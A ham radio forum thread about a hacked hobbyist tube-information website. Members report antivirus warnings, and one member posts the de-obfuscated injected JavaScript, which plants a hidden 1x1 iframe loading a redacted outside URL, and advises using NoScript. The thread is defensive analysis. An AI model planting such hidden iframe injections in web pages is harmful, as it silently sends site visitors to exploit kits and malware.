WA2ISE website hacked?

[W8AAZ]

I have often gone to the WA2ISE website to get submini tube info and he also has other stuff on the website.  However today I went there and got nothing but warning popups from my antivirus saying that there were malware attacks from the site that it was blocking.  I wonder how to contact him to give a heads up.  As his contact info is on the messed up webpage!   

[WN2C]

I sent him a PM on the Zed

[G8HQP]

Good. My anti-virus reported it had foiled an attack from that site. Let's hope he can soon fix it and be back up again.

[W8AAZ]

On another forum a poster replied that he had no problem, his APPLE computer reported no threats. Those folks never get over gloating....

[G8HQP]

Someone running Linux could have a look and report back? I should have thought of that a few days ago, but I have just had to tidy the table and so clear away my Raspberry Pi for a while.

[W8AAZ]

Tried it again today, white screen and popup message that the threat was blocked, something called "exploit blackhole exploit kit"  or some such, as the warning popup window unpops itself fairly soon.  I do not try to push my luck by pursueing  beyond that warning.  Too bad.  Another site I frequented for years got something rather nasty that would actually make me spend an afternoon debugging the computer.  I sent them warning about it.  Went back a week or so later and still got attacked.  Stayed away for many months and eventually it was safe to use again, but they had changed the format of the site so much I didn't like it, anyway.

[KE4DRN]

hi,

just tried the site and it works fine,
firefox and running trend micro here at the office.

73 james

[DJ1YFK]

There's a bit of JavaScript code embedded on that site that most certainly does not belong there.

It contains an array of scrambled JavaScript code which is then translated into some more JavaScript which, when executed, embeds an iframe into the site. This iframe, most likely on another hacked website, probably contained something malicious, but it doesn't seem to exist anymore (Error 404). Probably the owner of that other website (with an Italian domain name, probably completely unrelated to WA2ISE) has noticed the breach and cleaned up his server.

Code:

(function () {
    var fe = document.createElement('iframe');

    fe.src = 'http://EDITED.it.invalid/esd.php';
    fe.style.position = 'absolute';
    fe.style.border = '0';
    fe.style.height = '1px';
    fe.style.width = '1px';
    fe.style.left = '1px';
    fe.style.top = '1px';

    if (!document.getElementById('fe')) {
        document.write('<div id=\'fe\'></div>');
        document.getElementById('fe').appendChild(fe);
    }

})();

Bottom line: There's still some JavaScript on that website which doesn't belong there. but it isn't harmful. However the owner of the website should remove it, try to find out how it got there, and at the very least change his access password etc. to make further breakins of this kind less likely to happen.

To protect oneself from problems by such malicious code from random websites, I highly recommend to switch off JavaScript in the browser off by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/) which allows very fine grained script settings to be made for each website. There are similar things for other browsers too.

73
Fabian, DJ1YFK

[W0BTU]

There's a bit of JavaScript code embedded on that site that most certainly does not belong there. ... I highly recommend to switch off JavaScript in the browser off by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/)

Good observation, and great advice. I wouldn't think of using anything but Firefox and NoScript.